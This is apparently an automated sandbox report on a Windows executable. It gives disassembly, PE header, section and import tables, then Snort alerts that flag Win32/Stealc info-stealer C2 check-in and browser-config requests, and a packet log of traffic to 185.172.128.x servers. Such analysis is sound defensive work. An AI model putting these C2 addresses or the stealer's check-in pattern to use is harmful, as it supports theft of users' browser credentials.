                                                                                                                                                                                                                                                                                      call 00007F65558AD174h
                                                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                                                      jns 00007F65558AB39Ah
                                                                                                                                                                                                                                                                                      push 0000001Bh
                                                                                                                                                                                                                                                                                      call 00007F65558AB446h
                                                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                                                      call dword ptr [0040F0C4h]
                                                                                                                                                                                                                                                                                      mov dword ptr [04046868h], eax
                                                                                                                                                                                                                                                                                      call 00007F65558AF3F9h
                                                                                                                                                                                                                                                                                      mov dword ptr [00455820h], eax
                                                                                                                                                                                                                                                                                      call 00007F65558AEFF6h
                                                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                                                      jns 00007F65558AB39Ah

                                                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                                                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                                                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                                                                                                                                                                      • [LNK] VS2013 UPD5 build 40629

                                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x151fc0x50.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c470000x22069.rsrc
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xf1f00x38.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x147980x40.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xf0000x18c.rdata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                      .text0x10000xdde30xde0015b07b85bcd9520d4f37fdd0be763da8False0.6055567286036037data6.704408972550424IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .rdata0xf0000x6b200x6c00148298c80b94a7d27eb0460d57fb10caFalse0.3941333912037037data4.804310456243546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                      .data0x160000x3c308800x3f800b551e695ab88d39c5abb037711c2fff2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .rsrc0x3c470000x220690x222004b3ed349a7712de61b75308f83845ecdFalse0.4784655448717949data5.5474239505686285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                      RT_ICON0x3c47a180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.48587420042643925
                                                                                                                                                                                                                                                                                      RT_ICON0x3c488c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.5974729241877257
                                                                                                                                                                                                                                                                                      RT_ICON0x3c491680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.6463133640552995
                                                                                                                                                                                                                                                                                      RT_ICON0x3c498300x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.634393063583815
                                                                                                                                                                                                                                                                                      RT_ICON0x3c49d980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.39097510373443983
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4c3400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.5079737335834896
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4d3e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304RomanianRomania0.5848360655737705
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4dd700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.675531914893617
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4e1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.5676972281449894
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4f0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5469314079422383
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4f9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6184971098265896
                                                                                                                                                                                                                                                                                      RT_ICON0x3c4fe900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4619294605809129
                                                                                                                                                                                                                                                                                      RT_ICON0x3c524380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4896810506566604
                                                                                                                                                                                                                                                                                      RT_ICON0x3c534e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.4934426229508197
                                                                                                                                                                                                                                                                                      RT_ICON0x3c53e680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.4521276595744681
                                                                                                                                                                                                                                                                                      RT_ICON0x3c542d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.4163113006396588
                                                                                                                                                                                                                                                                                      RT_ICON0x3c551780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.4657039711191336
                                                                                                                                                                                                                                                                                      RT_ICON0x3c55a200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5697004608294931
                                                                                                                                                                                                                                                                                      RT_ICON0x3c560e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.4624277456647399
                                                                                                                                                                                                                                                                                      RT_ICON0x3c566500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4640041493775934
                                                                                                                                                                                                                                                                                      RT_ICON0x3c58bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4831144465290807
                                                                                                                                                                                                                                                                                      RT_ICON0x3c59ca00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.5004098360655738
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5a6280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.5567375886524822
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5aa900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.4928038379530917
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5b9380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.4648014440433213
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5c1e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.44508670520231214
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5c7480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.27645228215767637
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5ecf00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.28728893058161353
                                                                                                                                                                                                                                                                                      RT_ICON0x3c5fd980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.30655737704918035
                                                                                                                                                                                                                                                                                      RT_ICON0x3c607200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.3351063829787234
                                                                                                                                                                                                                                                                                      RT_ICON0x3c60b880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.39019189765458423
                                                                                                                                                                                                                                                                                      RT_ICON0x3c61a300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.5703971119133574
                                                                                                                                                                                                                                                                                      RT_ICON0x3c622d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.5910138248847926
                                                                                                                                                                                                                                                                                      RT_ICON0x3c629a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.5274566473988439
                                                                                                                                                                                                                                                                                      RT_ICON0x3c62f080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RomanianRomania0.5145228215767634
                                                                                                                                                                                                                                                                                      RT_ICON0x3c654b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RomanianRomania0.5841932457786116
                                                                                                                                                                                                                                                                                      RT_ICON0x3c665580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RomanianRomania0.5762295081967214
                                                                                                                                                                                                                                                                                      RT_ICON0x3c66ee00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RomanianRomania0.6374113475177305
                                                                                                                                                                                                                                                                                      RT_STRING0x3c673480x3ecdataRomanianRomania0.4601593625498008
                                                                                                                                                                                                                                                                                      RT_STRING0x3c677340x4b6dataRomanianRomania0.44859038142620233
                                                                                                                                                                                                                                                                                      RT_STRING0x3c67bec0x18edataRomanianRomania0.5175879396984925
                                                                                                                                                                                                                                                                                      RT_STRING0x3c67d7c0x4a2dataRomanianRomania0.43844856661045534
                                                                                                                                                                                                                                                                                      RT_STRING0x3c682200x59cdataRomanianRomania0.4449860724233983
                                                                                                                                                                                                                                                                                      RT_STRING0x3c687bc0x230dataRomanianRomania0.49107142857142855
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x3c689ec0x68dataRomanianRomania0.7115384615384616
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x3c68a540x76dataRomanianRomania0.6610169491525424
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x3c68acc0x76dataRomanianRomania0.6694915254237288
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x3c68b440x76dataRomanianRomania0.6694915254237288
                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x3c68bbc0x68dataRomanianRomania0.7211538461538461
                                                                                                                                                                                                                                                                                      RT_VERSION0x3c68c240x1e4data0.5371900826446281
                                                                                                                                                                                                                                                                                      RT_MANIFEST0x3c68e080x261XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators0.5451559934318555

                                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                      KERNEL32.dllLocalCompact, GetUserDefaultLCID, AddConsoleAliasW, CreateHardLinkA, GetTickCount, EnumTimeFormatsW, GetUserDefaultLangID, FindResourceExA, GetVolumeInformationA, GetLocaleInfoW, GetCompressedFileSizeA, MultiByteToWideChar, GetTempPathW, SetThreadLocale, ChangeTimerQueueTimer, SetLastError, GetProcAddress, FindFirstChangeNotificationW, BuildCommDCBW, LoadLibraryA, WriteConsoleA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetExitCodeThread, RemoveDirectoryW, AddAtomA, SetNamedPipeHandleState, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, ReadConsoleInputW, GetWindowsDirectoryW, AddConsoleAliasA, SetFileAttributesA, GetComputerNameA, WriteConsoleW, GetStringTypeW, GetLastError, HeapFree, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapAlloc, GetProcessHeap, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, WriteFile, GetModuleFileNameW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, OutputDebugStringW, CreateFileW
                                                                                                                                                                                                                                                                                      ADVAPI32.dllDeregisterEventSource
                                                                                                                                                                                                                                                                                      WINHTTP.dllWinHttpConnect

                                                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                      RomanianRomania

                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      04/23/24-09:28:00.837763TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4970880192.168.2.5185.172.128.76
                                                                                                                                                                                                                                                                                      04/23/24-09:28:01.224150TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24970880192.168.2.5185.172.128.76
                                                                                                                                                                                                                                                                                      04/23/24-09:28:01.851964TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M18049708185.172.128.76192.168.2.5
                                                                                                                                                                                                                                                                                      04/23/24-09:28:01.539793TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24970880192.168.2.5185.172.128.76
                                                                                                                                                                                                                                                                                      04/23/24-09:27:56.592477TCP2856233ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)4970580192.168.2.5185.172.128.90
                                                                                                                                                                                                                                                                                      04/23/24-09:28:01.538180TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M18049708185.172.128.76192.168.2.5

                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:53.991260052 CEST49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:53.991313934 CEST49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:54.131942987 CEST49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:56.387932062 CEST4970580192.168.2.5185.172.128.90
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:56.592187881 CEST8049705185.172.128.90192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:56.592325926 CEST4970580192.168.2.5185.172.128.90
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:56.592477083 CEST4970580192.168.2.5185.172.128.90
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:56.796643972 CEST8049705185.172.128.90192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.174693108 CEST8049705185.172.128.90192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.175677061 CEST4970580192.168.2.5185.172.128.90
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.187032938 CEST4970680192.168.2.5185.172.128.228
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.389516115 CEST8049706185.172.128.228192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.389614105 CEST4970680192.168.2.5185.172.128.228
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.389693022 CEST4970680192.168.2.5185.172.128.228
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.592063904 CEST8049706185.172.128.228192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.592356920 CEST8049706185.172.128.228192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.593240976 CEST4970680192.168.2.5185.172.128.228
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.604062080 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.806951046 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.807076931 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:58.807173014 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.009829998 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010128021 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010210037 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010227919 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010246038 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010262012 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010277987 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010273933 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010297060 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010314941 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010333061 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010345936 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010345936 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010350943 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010375977 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010415077 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213397026 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213418961 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213428020 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213437080 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213445902 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213454008 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213464022 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213473082 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213480949 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213490009 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213498116 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213505983 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213521004 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213529110 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213537931 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213556051 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213570118 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213586092 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213601112 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213615894 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213624001 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213670969 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416518927 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416543961 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416560888 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416577101 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416594028 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416609049 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416625023 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416637897 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416640997 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416637897 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416656971 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416673899 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416686058 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416686058 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416692972 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416709900 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416724920 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416750908 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416768074 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416783094 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416796923 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416800022 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416816950 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416819096 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416835070 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416851997 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416866064 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416867018 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416884899 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416886091 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416902065 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416909933 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416919947 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416937113 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416950941 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416951895 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416968107 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.416985035 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417000055 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417001963 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417020082 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417032957 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417036057 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417052984 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417068005 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417073011 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417073011 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417084932 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417109966 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417124987 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417134047 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417141914 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417160034 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417172909 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417176008 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417192936 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417208910 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417217970 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417241096 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.417288065 CEST4970780192.168.2.5185.172.128.59
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.619967937 CEST8049707185.172.128.59192.168.2.5
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.620021105 CEST8049707185.172.128.59192.168.2.5
